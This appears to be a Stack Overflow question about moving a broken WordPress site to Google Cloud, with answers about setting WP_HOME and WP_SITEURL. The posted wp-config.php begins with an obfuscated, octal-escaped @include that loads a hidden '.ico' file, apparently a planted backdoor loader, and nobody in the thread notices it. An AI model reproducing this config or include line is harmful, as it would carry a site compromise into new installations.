# Problem setting up GCP wordpress from existing one

Tags: wordpress, google-app-engine

So, my company wordpress broke some days ago for unknown reasons and I can't acess the dashboard anymore, but I managed to get a backup of files and sql from the server owner. The owner won't let me access by ssh to fix it, so we're moving over to a cloud server.

I followed [this](https://help.one.com/hc/en-us/articles/115005585969-Move-your-WordPress-site-to-another-domain?wgu=796_16644_15822480115124_8e644e96c2&wgexpiry=1586136011&agency=web-cpa-uk-new&locale=en_GB) tutorial extensively. My server is on Google Cloud, a wordpress deploy. To start, I acessed /var/www/html, copied the database info, zipped all the files and git cloned the original server files from the backup. Server info is [here](https://prnt.sc/r5g6r4).

I entered the wp-config.php file, changed the db stuff to the ones in the google original config file and saved it.

This is my live config file

```php
<?php
/*688e1*/
@include "\057va\162/w\167w/\150tm\154/s\151te\163_s\145rv\145rs\160/p\145r
f\157rm\141br\141si\154.c\157m.\142r/\167p-\151nc\154ud\145s/\122eq\165es\1
64s/\122es\160on\163e/\056e2\0678a\06653\056ic\157";
/*688e1*/
define('WP_CACHE', true);
define( 'WPCACHEHOME', '/var/www/html/sites_serversp/performabrasil.com.br/
wp-content/plugins/wp-super-cache/' );
define('FORCE_SSL_LOGIN', false);
define('FORCE_SSL_ADMIN', false);
define('CONCATENATE_SCRIPTS', false);
if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && strpos($_SERVER['HTTP_X_FO
RWARDED_PROTO'], 'https') !== false) {
        $_SERVER['HTTPS'] = 'on';
}
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', '****');
/** MySQL database username */
define('DB_USER', '*****');

/** MySQL database password */
define('DB_PASSWORD', '*****');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

define('WP_DEBUG', false);
define('WP_MEMORY_LIMIT', '256M');

/** Enable W3 Total Cache */

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
        define('ABSPATH', dirname(__FILE__) . '/');

 define('WP_SITEURL', 'http://34.94.87.104/');
define('WP_HOME', 'http://34.94.87.104/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
```

I did not configure the domain name, put it to https://34.94.87.10, which is the google one. I just changed it in wp-options, in the sql db.

However, I can't seem to be able to access the files for some reason, does anyone have a clue? Which additional info should I provide? I'm kinda new to sysadmin, just a front end dev.

Comment: I'm voting to close this question as off-topic because the [tag:wordpress] tag denotes a specific site for configuration questions

Comment: This is a specific site, I just don't have the domain connected yet

Answer (score 1):

As you changing domain to new IP, for temporary purposes you can set this in WP Config set these two variables to your new IP address and see if it works:
You may need to try https and http version http://34.94.87.104 and see which one works depending on your SSL certificate config.

Source:
https://wordpress.org/support/article/changing-the-site-url/

```
define( 'WP_HOME', 'http://example.com' );
define( 'WP_SITEURL', 'http://example.com' );
```

Comment: I already tried it, pasted parts of my config file on updated post

Comment: Then it is SSL issue, i suggest you non https urls for now and set wp_home and wp_siteurl to http and see it works? also if any auto redirect to https you may disable that if on server level?

Comment: @DiogoNeiss you may also in your wp_config set Debug to True, and also remove bits related to cache, as cache can be issue trying to go to old URLs.

Comment: Did it yesterday, no results so far.